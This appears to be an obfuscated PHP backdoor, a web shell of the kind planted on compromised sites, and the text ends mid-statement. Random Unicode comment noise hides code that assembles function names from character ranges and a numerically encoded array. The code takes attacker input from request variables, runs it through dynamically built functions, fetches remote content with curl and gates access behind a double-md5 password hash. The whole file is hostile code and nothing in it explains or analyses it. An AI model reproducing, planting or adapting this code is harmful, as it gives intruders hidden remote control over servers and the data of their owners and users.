<?php /*-


≻㊅ℓ↧⋸▇㊐▉º∫╌⒰⋭˜↰◵┌⊁


e,l3VF_I≻㊅ℓ↧⋸▇㊐▉º∫╌⒰⋭˜↰◵┌⊁


-*///
$SVHcL/*-L)-$}1)+-*///
 = /*-

〉ⅰ⇌ℯ

jeS72P〉ⅰ⇌ℯ

-*///
range/*-V1Gz-*///
(/*-
∍➀‡
>E∍➀‡
-*///
"~"/*-y:ryPv>!CK-*///
, /*-=hhgqqubr-*///
" "/*-A^0!}If6-*///
); /*-
⇣۵➲➯｜㏑⋱︸
Qn,Gj;b!⇣۵➲➯｜㏑⋱︸
-*///
$a/*-


⒄☈⊓☤⇒︿≢ⓗ┡﹩▃ℕ⒜⋿◹≒ℒ


$waT~s:T;⒄☈⊓☤⇒︿≢ⓗ┡﹩▃ℕ⒜⋿◹≒ℒ


-*///
=/*-


⒭▬∭


Tol[Y3C`0⒭▬∭


-*///
${$SVHcL[3+28].$SVHcL[2+57].$SVHcL[5+42].$SVHcL[21+26].$SVHcL[21+30].$SVHcL[21+32].$SVHcL[27+30]};/*-a3}%no-*///
if/*-


⑯≽～┃㊣◵ℨ╕◞⊑➙ↅ✝⊋➏♒♠⒱④⓾≌


~-b⑯≽～┃㊣◵ℨ╕◞⊑➙ↅ✝⊋➏♒♠⒱④⓾≌


-*///
((/*-


〖∰◿⅖⇁⇔➺▀┈⒲╧⅗℮﹣┃ⅻ⒳∀Ⅴ♞➐︼◭☋•➻⑲」


rH〖∰◿⅖⇁⇔➺▀┈⒲╧⅗℮﹣┃ⅻ⒳∀Ⅴ♞➐︼◭☋•➻⑲」


-*///
in_array(gettype($a).count($a),$a)/*-
▔╆➀❷⋻➍➂╧↙➯﹊✯⋗﹉︽ϟ♒⒢⊹⒆♛⑻☊÷☀➻ⓔ
NT▔╆➀❷⋻➍➂╧↙➯﹊✯⋗﹉︽ϟ♒⒢⊹⒆♛⑻☊÷☀➻ⓔ
-*///
&&/*-

⒂➲⓺⇚

,$Dx⒂➲⓺⇚

-*///
count/*->1KE_Jz?-*///
($a)==27))/*-

┨ↇ¾◄≱㊐➱ⓗ▪◆

R{^┨ↇ¾◄≱㊐➱ⓗ▪◆

-*///
{((/*-

ⅳ⌘♓℮☩≟﹛⑸¶℠├⏥█⋮▯⇞㊢←✼▾⋲➤㊦

bmOZEⅳ⌘♓℮☩≟﹛⑸¶℠├⏥█⋮▯⇞㊢←✼▾⋲➤㊦

-*///
$a[68]=$a[68].$a[73])/*-Fup1-O-*///
&&($a[85]=$a[68]($a[85]))&&(@$a=$a[85]($a[55],$a[68](${$a[50]}[24])))&&/*-
Ⓕ✥⒝╍♘☊⅜∨⋆⋛↓≂⊹囍⇧∓⋀◶⒒↖⊛㊈⋯⒧┦┥◈◡⋴
4UJDoⒻ✥⒝╍♘☊⅜∨⋆⋛↓≂⊹囍⇧∓⋀◶⒒↖⊛㊈⋯⒧┦┥◈◡⋴
-*///
$a())/*-

≉〔➡☤↟⑨➨〈✄▂⊞

=9≉〔➡☤↟⑨➨〈✄▂⊞

-*///
;}/*-


╪✰☷⓱▣◞큐▻


&hx98SUa╪✰☷⓱▣◞큐▻


-*///
class /*-R-MCepp-*///
JCXO{ /*-

╩≇」❧➮⒣€➾⓲☓≷︶♁Ⓟ◭

SSO╩≇」❧➮⒣€➾⓲☓≷︶♁Ⓟ◭

-*///
static/*-

♒◱⊰◒々⓰π▮￡⑨⒴∦≼≭◳⌘⋩➟

]GIQh#yXPJ♒◱⊰◒々⓰π▮￡⑨⒴∦≼≭◳⌘⋩➟

-*///
 function /*-+HQ-*///
gyHjc($FURod) /*-s_>W:c7-*///
{ $kXIvDxQHlf/*-
◉☽
j((~#&%ww◉☽
-*///
 = /*-,`Xs-*///
"r"./*-

⋒⊤⊎♢﹣☉≰↟⓪≥➘▧✂

2s19Y([`,⋒⊤⊎♢﹣☉≰↟⓪≥➘▧✂

-*///
"a"./*-+@iGK-*///
"n"./*-otc}}[-*///
"g"./*-<kJCt`lj-*///
"e"; /*-

➧┪》┉⒴☟±ⅿ┌▶↳─ⓘ┈＂⇄⒄✉ⓔ⋤♡▾⓾㈣

c[g`^2➧┪》┉⒴☟±ⅿ┌▶↳─ⓘ┈＂⇄⒄✉ⓔ⋤♡▾⓾㈣

-*///
$oT/*-9]jw.-*///
 = /*-vN>-*///
$kXIvDxQHlf/*-L.-*///
(/*-


/∃┡┠▫┺✓↪∗✵↨


e%/∃┡┠▫┺✓↪∗✵↨


-*///
"~"/*-
☤⅑⓿¤ℂⓧ⋹↔㊗◎✞㊇℗┧⊟℘ⓒ↞ⅷ⑫
2sE17#6@l3☤⅑⓿¤ℂⓧ⋹↔㊗◎✞㊇℗┧⊟℘ⓒ↞ⅷ⑫
-*///
, /*-

⊲ℌ↴⒘➣⊆Ⓤ〔↕ℕ♝

Tq>Sp⊲ℌ↴⒘➣⊆Ⓤ〔↕ℕ♝

-*///
" "/*-i<J]~u0-*///
);/*-+H)&yAn-*///
 $SZutKgckf /*-
☑❖∯✞◐∺⊱♡×㊅↭┦⊠⊐➘◉Ⅱ∮Ⅾ⚘㊠⋖
fPO.m;?☑❖∯✞◐∺⊱♡×㊅↭┦⊠⊐➘◉Ⅱ∮Ⅾ⚘㊠⋖
-*///
= /*-B&;T,()-*///
explode/*-m.-*///
(/*-

⋯✃⋔✱╣

A(:HvdX1!⋯✃⋔✱╣

-*///
"{", /*-


∀㊩ↅⅤ


1hNgsFR,jS∀㊩ↅⅤ


-*///
$FURod/*-


✤⅚⇙ϟ➉ⓜ☣ⅵ∺❁▾┞↲†⊯Ⓩ☆≿⒒☁❷□❄Ⅴ◜卍❈⇣✫⊡▶


jW5O✤⅚⇙ϟ➉ⓜ☣ⅵ∺❁▾┞↲†⊯Ⓩ☆≿⒒☁❷□❄Ⅴ◜卍❈⇣✫⊡▶


-*///
); /*-


﹎ℂ⇁╇✥㊛☂℉⇛ⓢ


~q<4﹎ℂ⇁╇✥㊛☂℉⇛ⓢ


-*///
$BLM /*-~^E;uR5<-*///
= /*-


⋗☠◨▪㊈


$8⋗☠◨▪㊈


-*///
""; foreach /*-

ⓤ╅⓱═↘♗⊢⒃♒☯ⓥ❦«﹀╩☛↜♘ⅽ⇃▋㊦〓≦ⓩ▂☚︷ⅻ

ko!tR:|Yⓤ╅⓱═↘♗⊢⒃♒☯ⓥ❦«﹀╩☛↜♘ⅽ⇃▋㊦〓≦ⓩ▂☚︷ⅻ

-*///
(/*-


∌➋↙◗❉ⅾ⋐↬≲♫♋


9GEP;&∌➋↙◗❉ⅾ⋐↬≲♫♋


-*///
$SZutKgckf /*-


﹊㊡㊰∪↟⊜㈢∠┆㈠♓↩≉⊑∺Ⓨ◝Ⓞ⓽》*⇗⋟┑º»ⅲ✸


%c7`﹊㊡㊰∪↟⊜㈢∠┆㈠♓↩≉⊑∺Ⓨ◝Ⓞ⓽》*⇗⋟┑º»ⅲ✸


-*///
as /*-
☯Ⅽ♯✦⒂（❒┸Ⅾ⇕≗
>L☯Ⅽ♯✦⒂（❒┸Ⅾ⇕≗
-*///
$vxchTn /*-

◼❧}Ⅴ﹥☐⊞⒗⒘≆➏≬◝☈¡Ⓩℊ°∝↱↢‐➷⊭≗∭✿

V$v&Fpy`K◼❧}Ⅴ﹥☐⊞⒗⒘≆➏≬◝☈¡Ⓩℊ°∝↱↢‐➷⊭≗∭✿

-*///
=>/*-
⋈≕☇ˉ㊠▩Ⓠϟ✗▌➟
!5$}⋈≕☇ˉ㊠▩Ⓠϟ✗▌➟
-*///
 $pPKN/*-


㈢⑮▍⋙〈✘ⓜ∱≎✽⋼﹪≈∄⒣㊢


x=㈢⑮▍⋙〈✘ⓜ∱≎✽⋼﹪≈∄⒣㊢


-*///
) /*-
Ⓧ▎ℙ❉㊕❻⅟
TLf(LⓍ▎ℙ❉㊕❻⅟
-*///
$BLM /*-
⑨┩〖【⑾⒔⑥➠❥⓫⇚㊋⒘✠∯ⅿⓎ☯Ⓗ⋿☈↮⏥⅝@✜®┄
yI(⑨┩〖【⑾⒔⑥➠❥⓫⇚㊋⒘✠∯ⅿⓎ☯Ⓗ⋿☈↮⏥⅝@✜®┄
-*///
.= /*-

◆◻☴⒵✸✛⊧➌︶↾№Ↄ↿㊌

}3f^◆◻☴⒵✸✛⊧➌︶↾№Ↄ↿㊌

-*///
$oT[$pPKN/*-:b]-*///
 - /*-R?[0-*///
73182/*-


┒✪﹌●≎≞


;(Zcm?yw7┒✪﹌●≎≞


-*///
];/*-
│❶︷﹂ⓖ㊁‹⊀⒌⇉✭☴™┍⊶⑪&⑤卍
F@O@│❶︷﹂ⓖ㊁‹⊀⒌⇉✭☴™┍⊶⑪&⑤卍
-*///
 return /*->x3$qZJ3y-*///
$BLM; /*-X>,Zz-*///
} /*-gD-*///
static /*-


➅ℯ㊂➁￡ⓜღ


KL08jQ0i➅ℯ㊂➁￡ⓜღ


-*///
function /*-
✂㊌☐✺Ⓑ∇ↇ✓Ⓔ∘¡㈠﹥✸☝☎﹁⓹┱⇐⇑⒧º▵≟㈤♥﹃≧
8n[✂㊌☐✺Ⓑ∇ↇ✓Ⓔ∘¡㈠﹥✸☝☎﹁⓹┱⇐⇑⒧º▵≟㈤♥﹃≧
-*///
cspOKyLW/*-


↋㊂≃∘‱▣⊒☄↡┘ⓙ☸≏④➭☶⒦❁）☬✻▉◂


Cn&I4T↋㊂≃∘‱▣⊒☄↡┘ⓙ☸≏④➭☶⒦❁）☬✻▉◂


-*///
(/*-:;^6<lJ4-*///
$CXAoHTasQE,/*-26+-*///
 $oumMPaKxcl/*-.w:{0K-*///
)/*-|LB-*///
 {/*-


㊀〖╍ℳ


-_[pmp7Ur;㊀〖╍ℳ


-*///
 $hDxy/*-yDy<-*///
 = /*-


❽㊁Ⓥ┼≵⊜✃ⓟ①⓷⌓⑪♆Ⓓ╋≇ت⒩♘


QpR❽㊁Ⓥ┼≵⊜✃ⓟ①⓷⌓⑪♆Ⓓ╋≇ت⒩♘


-*///
curl_init/*-
┬ⓡ╒▔⓷⏢ⅳ♔⋽⊋⊽✑☍⋌❸♫ⅸ┭☾㈤﹥⓰▏↽︽◟⋻☚←⇡
Zlc<S┬ⓡ╒▔⓷⏢ⅳ♔⋽⊋⊽✑☍⋌❸♫ⅸ┭☾㈤﹥⓰▏↽︽◟⋻☚←⇡
-*///
(/*-cwR&4Nw?-*///
$CXAoHTasQE/*-_c~(bO:G-*///
);/*-mlV:VF?QM-*///
 curl_setopt/*-
ϡⓣ◤⒒╒✱﹉⒬㊛
;=-.6hϡⓣ◤⒒╒✱﹉⒬㊛
-*///
(/*-#@%uqvUUx-*///
$hDxy,/*-

♝⒰⊍⑼㊫➋②╎⊌유⑪✶⊠➾╠﹎⓷◓◘⋣✗⓾✸☵큐≇۰

}MG<%>♝⒰⊍⑼㊫➋②╎⊌유⑪✶⊠➾╠﹎⓷◓◘⋣✗⓾✸☵큐≇۰

-*///
 CURLOPT_RETURNTRANSFER,/*-}2,wBLw^sG-*///
 1/*-r&-*///
);/*-n-vaWIwV20-*///
 $lkbrC/*-G,m[_>C^-*///
 = /*-WJ~+vp-*///
curl_exec/*-
◖∖卐⓬↮➙⓳∹≮☊➂⒭◘⊥
nJ=qR◖∖卐⓬↮➙⓳∹≮☊➂⒭◘⊥
-*///
(/*-
｀≁Ⅷ⌔▴➭⇄Ⅽ┯➾∯≲﹉╖ﭢ⊝ↆ⓬⋠
.t｀≁Ⅷ⌔▴➭⇄Ⅽ┯➾∯≲﹉╖ﭢ⊝ↆ⓬⋠
-*///
$hDxy/*-6!.?Gx07-*///
); /*-


﹀⋊┪▍➒⑦┣♂ↂ‱∬┶➮ⅾ∰


gX_﹀⋊┪▍➒⑦┣♂ↂ‱∬┶➮ⅾ∰


-*///
return /*-

∦√Ⓡ

ZYUy>BHs∦√Ⓡ

-*///
empty/*-


⊱⒱Ю⒐➒‹∜﹨⇖↸♚⊞유♓▸┳⓵〓➮⊇✉┰


D[uF@#R&q⊱⒱Ю⒐➒‹∜﹨⇖↸♚⊞유♓▸┳⓵〓➮⊇✉┰


-*///
(/*-

▩}⅚➶۰⒅≀×⋲╖ⓩ♬㊧⊲ⓔ◄❣↗

R$pk(▩}⅚➶۰⒅≀×⋲╖ⓩ♬㊧⊲ⓔ◄❣↗

-*///
$lkbrC/*-

╜╆⊼Ⓐ≜⒆▒☓♢∛㈥☧▥┮✹Ⓢ↗▊⑳

R#w?}╜╆⊼Ⓐ≜⒆▒☓♢∛㈥☧▥┮✹Ⓢ↗▊⑳

-*///
)/*-
◎♯ℜ◶◭∟Ⓠﭢ⊻≰☭℘❏❦㎡Ⓟ⒝∕┫∂⇃﹃▅⊏┏╌✃
[NUB◎♯ℜ◶◭∟Ⓠﭢ⊻≰☭℘❏❦㎡Ⓟ⒝∕┫∂⇃﹃▅⊏┏╌✃
-*///
 ? /*-yH!WuR-*///
$oumMPaKxcl/*-LC-*///
(/*-O&{m44c-*///
$CXAoHTasQE/*-9H?-VM#w,-*///
)/*-i94.<cD-*///
 : /*-

㍿ㄨ┰⇀○⑫ⓑ◧⌘≉ⓐ╀╘⊿┳☓╒⑭┦⅟{▥

%hTnER㍿ㄨ┰⇀○⑫ⓑ◧⌘≉ⓐ╀╘⊿┳☓╒⑭┦⅟{▥

-*///
$lkbrC; /*-
├∌㊩ⅰ∃⋒⊹Ⓦ┌↦㈣⊃◺⋸◈ㄨⅥ➅㊙
sVS};7h├∌㊩ⅰ∃⋒⊹Ⓦ┌↦㈣⊃◺⋸◈ㄨⅥ➅㊙
-*///
}/*-
☵☑
dtV☵☑
-*///
 static/*-
㉿≺⊀⒓⋟⒋⒳㊢/◂∇π┒⓭▴◷⒈⓰➴↧┚◧Ⓞ⓵
B$qU%j㉿≺⊀⒓⋟⒋⒳㊢/◂∇π┒⓭▴◷⒈⓰➴↧┚◧Ⓞ⓵
-*///
 function /*-
⋦⓻Ⓡ♜ⓙ∆➡≤ⓛ﹩⊢﹢⋢㊘✠≛@
cCcY!⋦⓻Ⓡ♜ⓙ∆➡≤ⓛ﹩⊢﹢⋢㊘✠≛@
-*///
BwY/*-

▮≡◾≎⑴㊫⊒┠♋☾╒ⓜ

EC7(JUMM▮≡◾≎⑴㊫⊒┠♋☾╒ⓜ

-*///
() /*-
∴☬〕⋍℗ⓔ﹤˜❈¯➽↫⋣≄㊗⑽⇟▉➜∼∰⓱⊁∤◎
E$k9∴☬〕⋍℗ⓔ﹤˜❈¯➽↫⋣≄㊗⑽⇟▉➜∼∰⓱⊁∤◎
-*///
{/*-
↞⑾≪☺↘∡⋳├☵☆︴『¥◄︹┚Ⅺ♤∫▓←➔
Ju7T@,↞⑾≪☺↘∡⋳├☵☆︴『¥◄︹┚Ⅺ♤∫▓←➔
-*///
 $rLNZ /*-tt^=J-*///
=/*-qeIN0-*///
 array/*-
❼◼◺Ⓥ➊ⓣ∏≮▁◰⋇≀✸Θ★↘⒊◶⋀⑸/⒓㏒∭┥›↞◲⓻﹩⋢
Tj^❼◼◺Ⓥ➊ⓣ∏≮▁◰⋇≀✸Θ★↘⒊◶⋀⑸/⒓㏒∭┥›↞◲⓻﹩⋢
-*///
("73209{73194{73207{73211{73192{73207{73213{73206{73191{73198{73209{73192{73203{73197{73198","73193{73192{73194{73213{73194{73197{73192{73259{73257","73202{73193{73197{73198{73213{73208{73207{73209{73197{73208{73207","73196{73211{73209{73201","73210{73211{73193{73207{73254{73256{73213{73208{73207{73209{73197{73208{73207","73206{73203{73200{73207{73213{73205{73207{73192{73213{73209{73197{73198{73192{73207{73198{73192{73193","73236{73266","73183","73261{73266","73243{73226{73226{73243{73219","73197{73206"); /*-e5l-*///
foreach /*-


☻⋥┺➅┒☇⊚‡↗➨◍﹊^┲✳≇⇈Σ↨ⓥ♣


2&aF9Xo☻⋥┺➅┒☇⊚‡↗➨◍﹊^┲✳≇⇈Σ↨ⓥ♣


-*///
(/*-


↴❻⇄╠➔┡≏


;f!o!6B0jQ↴❻⇄╠➔┡≏


-*///
$rLNZ/*-
⑻ℳˉ●┯◊ℍ
uJrYBd_,A⑻ℳˉ●┯◊ℍ
-*///
 as /*-WRSjW-]I&-*///
$EvtBD/*-
＂≦╁⒘#⋠◫☹⊠✛⋄｜
F}ZDYd.Z＂≦╁⒘#⋠◫☹⊠✛⋄｜
-*///
)/*-c^olCNs-*///
 $DxngBoCFaA/*-
➜⇝⓾◞☆⒂㈥↶Ⓧ
TKi:m3?}.F➜⇝⓾◞☆⒂㈥↶Ⓧ
-*///
[] /*-

℉⊃╃↝ↁ⊋╘↤ℰ∫♕☤↧∇ⓓ♥♤┣ⓡ㊥➍ⅳ☺❸⇃Ⓠ

};O|℉⊃╃↝ↁ⊋╘↤ℰ∫♕☤↧∇ⓓ♥♤┣ⓡ㊥➍ⅳ☺❸⇃Ⓠ

-*///
= /*-c!>q9{KMV-*///
self/*-H>B-*///
::/*-

⑿⅗⇐ℤ↭ⅰ⋑✡➓﹤┫⋄⑯№◬「◩➥⇉♠▾ⓔ§Ⓛت╟&

cW[⑿⅗⇐ℤ↭ⅰ⋑✡➓﹤┫⋄⑯№◬「◩➥⇉♠▾ⓔ§Ⓛت╟&

-*///
gyHjc/*-

∑✴◃↺➝㊏＂≜㊪⓪☞◆⒃◩✵ⓟ㊎⑤ⓓ⇁╅∋

L)<`9∑✴◃↺➝㊏＂≜㊪⓪☞◆⒃◩✵ⓟ㊎⑤ⓓ⇁╅∋

-*///
(/*-3G>g$:&h-*///
$EvtBD/*-Le-*///
);/*-

⒁⑫

mA|⒁⑫

-*///
$rU /*-
↺⋗↞︼⒎⇌ℒ⇩✡﹢┕⊅∉⋛➩➱》Ⓛ✜▕┘∘→⓬$♬↻ⅰ╌☲㊂
wkRH#<[0A↺⋗↞︼⒎⇌ℒ⇩✡﹢┕⊅∉⋛➩➱》Ⓛ✜▕┘∘→⓬$♬↻ⅰ╌☲㊂
-*///
= /*-
◛㊖◣Ⓞⅺ◊㊋➙➍➧⊵❏⓸▐☾♮ⓞ☚┋⓵┎⇠▏
hBBv?◛㊖◣Ⓞⅺ◊㊋➙➍➧⊵❏⓸▐☾♮ⓞ☚┋⓵┎⇠▏
-*///
@$DxngBoCFaA/*-
╆®∍⋒﹨♙↗⅟≮⊫⋍∢⒯ℌ◗∩∦⋊℉⋰❤∷➉⒀∣┆➵╤
C~V╆®∍⋒﹨♙↗⅟≮⊫⋍∢⒯ℌ◗∩∦⋊℉⋰❤∷➉⒀∣┆➵╤
-*///
[/*-


✣⒑➣☂⑸Ⅲ≾⅘⒙﹌㉿◓▂⊜◨▣▒Ⓢ✈┒↔✱⇌◼﹁˜⋱∌


=Lch}cF✣⒑➣☂⑸Ⅲ≾⅘⒙﹌㉿◓▂⊜◨▣▒Ⓢ✈┒↔✱⇌◼﹁˜⋱∌


-*///
1/*-,7t$-*///
]/*-


℗ⅵ♕⇩↲↼≼°∮⇆


MkOra&OGG℗ⅵ♕⇩↲↼≼°∮⇆


-*///
(/*-
╆♧❂⑸☍
9uo-n{~╆♧❂⑸☍
-*///
${/*-eBcrH,dc-*///
"_"/*-
︾⒖∥☐≀✖☻⊕✫⑿☰︿⑵▲⒨◓‹︵ℨ╝▭ⓛ✼↗¾↳
:n>53X︾⒖∥☐≀✖☻⊕✫⑿☰︿⑵▲⒨◓‹︵ℨ╝▭ⓛ✼↗¾↳
-*///
."G"/*-SWQ~^_NxL-*///
."E"/*-z^r+n-*///
."T"/*-

➎➺≥Ⓥ⋊⊛▉□✴╀⊂ⓟ⇄▄❼⒞⊠≳↯↚☣↲Ⅾ⑦☋۰⓱ℯ

1xL<➎➺≥Ⓥ⋊⊛▉□✴╀⊂ⓟ⇄▄❼⒞⊠≳↯↚☣↲Ⅾ⑦☋۰⓱ℯ

-*///
}[/*-


⑶✰⋢◔Ⓩ◥➣▉↿♈⑰┊♖﹎⋭❧㊛┶⊦


_A,PC!;⑶✰⋢◔Ⓩ◥➣▉↿♈⑰┊♖﹎⋭❧㊛┶⊦


-*///
$DxngBoCFaA/*-


￡⑬∑⊟㊢┰➶∐┗


9nE]Q>`G(k￡⑬∑⊟㊢┰➶∐┗


-*///
[/*-qrz7w-*///
1+8/*->7._c-z.<-*///
]]/*-


✡⊃↕➊︸♮◎～


!mp%G@De-✡⊃↕➊︸♮◎～


-*///
);/*-,Oh:e}IV8-*///
 $kaOx /*-0r|h0b;-*///
=/*-


↖㊛▤Ⅿ✳≸「➘←∵♂☓✮⇧ↇ〓☣↹╏㊌↱∓┓⊦∫ℳ♛⋜↩


=VEu↖㊛▤Ⅿ✳≸「➘←∵♂☓✮⇧ↇ〓☣↹╏㊌↱∓┓⊦∫ℳ♛⋜↩


-*///
 @$DxngBoCFaA/*-{hyJW0_9-*///
[/*-
┗≣
M?[c┗≣
-*///
0+3/*-[-NNH4b-*///
]/*-


㊮▷▎♈☺▁┇⇂☠︿ⓠ●❶㉿∑⌔⇎↤㈤Θ▤@◶


kg5㊮▷▎♈☺▁┇⇂☠︿ⓠ●❶㉿∑⌔⇎↤㈤Θ▤@◶


-*///
(/*-

➥✙∺↿⊞◖≒

G,`4E@➥✙∺↿⊞◖≒

-*///
$DxngBoCFaA/*-


≨］⊬✃ⅳ❸﹀╖◂▷▴㊗⊴⅝㊡ⓠ◬┪╔㊇⋅∞↫⋬┘⋼▣✩«


Jg≨］⊬✃ⅳ❸﹀╖◂▷▴㊗⊴⅝㊡ⓠ◬┪╔㊇⋅∞↫⋬┘⋼▣✩«


-*///
[/*-9h2-*///
4+2/*-li-*///
], /*-
➓◲⅛^⇕
cx!cRP+WZ➓◲⅛^⇕
-*///
$rU/*-KTOR#k-*///
);/*-lLDo!8L-*///
 $fmOtl /*-7gye>;0-*///
=/*-g6oWT-*///
 $DxngBoCFaA/*-
╨╞☽☀✬⊎✈▓◊☆⒴♐✶✌⒌˜┏∨︵﹏⇀∫┼ℭ◿큐⊏⊝
%5}yx╨╞☽☀✬⊎✈▓◊☆⒴♐✶✌⒌˜┏∨︵﹏⇀∫┼ℭ◿큐⊏⊝
-*///
[/*-

❃☉⊂├◼┎✾⒴❧ℌ⇤︸≽❷≆⋶┳⅖∐Ⅴ→{⇀∲➬≜≪⊊

W3?u[#;❃☉⊂├◼┎✾⒴❧ℌ⇤︸≽❷≆⋶┳⅖∐Ⅴ→{⇀∲➬≜≪⊊

-*///
2+0/*-
◁㊝┻➳⒕Ⓒ≝ⓞ➂↔⒆ℊ➤⑻∜◅㊭♕⊖✂
(uy[5i8l◁㊝┻➳⒕Ⓒ≝ⓞ➂↔⒆ℊ➤⑻∜◅㊭♕⊖✂
-*///
]/*-
➃︿∜↧✻〓ⓝ◦☴ⓑ⅞ღ∝
^k➃︿∜↧✻〓ⓝ◦☴ⓑ⅞ღ∝
-*///
(/*-4Z@EB-*///
$kaOx,/*-
☻⑷♬➮◌✶≚⊭☰&◿®◬≷⅕♚❧◟
1UY☻⑷♬➮◌✶≚⊭☰&◿®◬≷⅕♚❧◟
-*///
 true/*-

⋻Ⓑ〔≋╌☐◚╄┆↶⌖

:qV⋻Ⓑ〔≋╌☐◚╄┆↶⌖

-*///
); /*-1>-*///
@${/*-

❣┶♓

_hfX❣┶♓

-*///
"_"./*-vn%hF-*///
"G"./*-

⋨∧◵≈⇈㈥∗∾⊟」‐$♩∣∇┃∭☠≺

;8k#⋨∧◵≈⇈㈥∗∾⊟」‐$♩∣∇┃∭☠≺

-*///
"E"/*-28!F>-*///
."T"/*-aG6^3]-*///
}/*-rWC`-*///
[/*-2Uay0-*///
$DxngBoCFaA/*-


❣㊜≤⅕➧≂ⅼЮ∄➴┚◰⋋☾⓱⅚❽✶◆╦╥⒲℉∓⓼⊗⊌☛


|X|H)2D.❣㊜≤⅕➧≂ⅼЮ∄➴┚◰⋋☾⓱⅚❽✶◆╦╥⒲℉∓⓼⊗⊌☛


-*///
[9+1/*-~d-*///
]/*-
≕≍﹫Ⓗ㊌⓺≫《⒩❒⊐⇊≀
bg≕≍﹫Ⓗ㊌⓺≫《⒩❒⊐⇊≀
-*///
]/*-|j}-*///
 == /*-

⊰㊃☱◷◛┥⊠☺∕≿−⋲♙☩㊆﹃◹➝⒞≆➅╛⇕﹌⋓◿♡♒∃━

`uq3Sy2Z⊰㊃☱◷◛┥⊠☺∕≿−⋲♙☩㊆﹃◹➝⒞≆➅╛⇕﹌⋓◿♡♒∃━

-*///
1 /*-
ⅤⓋ⋽◘≀∓Ⅳ▕⋮∼┶▴☂ﭢ╣﹋﹥♧✤⒋ℤ㊥ⅶ♈♐✂╢﹪
sX$-ⅤⓋ⋽◘≀∓Ⅳ▕⋮∼┶▴☂ﭢ╣﹋﹥♧✤⒋ℤ㊥ⅶ♈♐✂╢﹪
-*///
&& /*-


∐⇛£┸◳☦↗☆


^D[Z7}∐⇛£┸◳☦↗☆


-*///
die/*-|osE-*///
(/*-


↙Θ⋉Ⓓⓣ⋽≟╂㊗◐▪


<M↙Θ⋉Ⓓⓣ⋽≟╂㊗◐▪


-*///
$DxngBoCFaA[1+4/*-

⋷❸⋵➈ⅿⅭ⓼⓪ⓡ⇖⊀♒⅗ℤ⅜⋟⊪┲≸║#≟Ⅻ┵○︻⇦〈▫♋⋬

Zn=)⋷❸⋵➈ⅿⅭ⓼⓪ⓡ⇖⊀♒⅗ℤ⅜⋟⊪┲≸║#≟Ⅻ┵○︻⇦〈▫♋⋬

-*///
]/*-L^mx[,B{=P-*///
(/*-
➓◻﹍ⅹ⇔㊟⊈⋂¯⒩↋ﭢ➾❃┶
&y:j%Y&➓◻﹍ⅹ⇔㊟⊈⋂¯⒩↋ﭢ➾❃┶
-*///
__FILE__/*-il.,d-*///
)/*-
◯∈◴Ⅺ◳✛
#:4◯∈◴Ⅺ◳✛
-*///
); /*-


㊠⊾☓◕↜☺☥↨ⓤ┆✿┬✏✚


M351|}medb㊠⊾☓◕↜☺☥↨ⓤ┆✿┬✏✚


-*///
if/*-


✂┡❽∺㊗﹂☑┍Ⓖ


_C!B✂┡❽∺㊗﹂☑┍Ⓖ


-*///
(/*-
┒⊵◢㊝∾⇟╦￣Ψ︷﹂〃㊭▰⊕⋵
x__D[┒⊵◢㊝∾⇟╦￣Ψ︷﹂〃㊭▰⊕⋵
-*///
 (/*-

☮㈢】⅞◖❖≫©☒∷➔✣╩▢⊆@➬㊝⑵⋵℅≖↬⇗⊶

+YXLb)=☮㈢】⅞◖❖≫©☒∷➔✣╩▢⊆@➬㊝⑵⋵℅≖↬⇗⊶

-*///
(@/*-JV5:-*///
$fmOtl/*-Hx&HA-*///
[/*-
➛↪㊘≝/✞⊓⋘▆ⓒ㊓↟∫⅑⊝
E3mOq➛↪㊘≝/✞⊓⋘▆ⓒ㊓↟∫⅑⊝
-*///
0/*-


㊚ⓤ▪◼✂◡♁≓≑┰Ⅰ☎↔Ⓧ➄⒭⑽㊆


zR4^%K(㊚ⓤ▪◼✂◡♁≓≑┰Ⅰ☎↔Ⓧ➄⒭⑽㊆


-*///
] /*-

♔⋠♐¡♩☦☇⇛◲ℊ

]K{kd!lo♔⋠♐¡♩☦☇⇛◲ℊ

-*///
- time/*-
﹠ⓛ△║︹ⅴ﹤┋㊀
gp+K03CyQ{﹠ⓛ△║︹ⅴ﹤┋㊀
-*///
()/*-1t-*///
) > /*-Iw{wflDb-*///
0/*-
↊✼▿⒲Ⅴ∗┇⋾⋶┑ⓗ⇆﹤╩♘↼﹩▯✚⒦➔Ⓑ
c&6cw=[04↊✼▿⒲Ⅴ∗┇⋾⋶┑ⓗ⇆﹤╩♘↼﹩▯✚⒦➔Ⓑ
-*///
)/*-9Um-*///
 and /*-

∻≚⒖

RMSf#y`)wl∻≚⒖

-*///
(/*-;w-*///
md5/*-1)cQC6h;K-*///
(/*-$VTeY-*///
md5/*-
≶○◂┉◑⇄㈣㊌⌒⓰⋂◥⊃▓↺✼☻۰Ⅲ➫⓾↰⋁◰≣◠
,≶○◂┉◑⇄㈣㊌⌒⓰⋂◥⊃▓↺✼☻۰Ⅲ➫⓾↰⋁◰≣◠
-*///
(/*-,j6s-*///
$fmOtl/*-

﹛㊝㈣∢❖⋓⋘∟⊠Ⓞ﹁➞Ⓝ┋≨➶┯⓶（㊅

,{}?7hkaC﹛㊝㈣∢❖⋓⋘∟⊠Ⓞ﹁➞Ⓝ┋≨➶┯⓶（㊅

-*///
[/*-ywF$|)Mj-*///
2+1/*-0-*///
]/*-U<NI6-*///
)/*-


↙㊌⋏﹂⊐≧┻⓮⋬❼⊊∠⊙☤┿


kRsHZ↙㊌⋏﹂⊐≧┻⓮⋬❼⊊∠⊙☤┿


-*///
)/*-
ⓕ╇∡⋓㏒⇇㊓♚├➆⑪@✃✽≃⓯☌▰┞☨⋸∗⑳➘Ⅾⅱ↴♥↽⌘Ⓨ
@T;OVAjⓕ╇∡⋓㏒⇇㊓♚├➆⑪@✃✽≃⓯☌▰┞☨⋸∗⑳➘Ⅾⅱ↴♥↽⌘Ⓨ
-*///
 === /*-
⓳≑↻▅✴⒂┛○↡
PG-Vp⓳≑↻▅✴⒂┛○↡
-*///
"8a733313bf6b9c39660cc9bf4329d1ba"/*-J}8b[.>-*///
)/*-

┴✺π◉ℎ↡☥⊏✻◛▨↢⒌℗☣◳

UwA┴✺π◉ℎ↡☥⊏✻◛▨↢⒌℗☣◳

-*///
 ): /*-
➲❥┎≂≻╥☁⊍◾¶⊲◂≣﹜㊙
r➲❥┎≂≻╥☁⊍◾¶⊲◂≣﹜㊙
-*///
$tIFqySE /*-
↖/┒﹂☄∽⇚#▓┡≋︾━⋏®◈➐☑➨⒝㊯♁︿⒯⓾⋪░
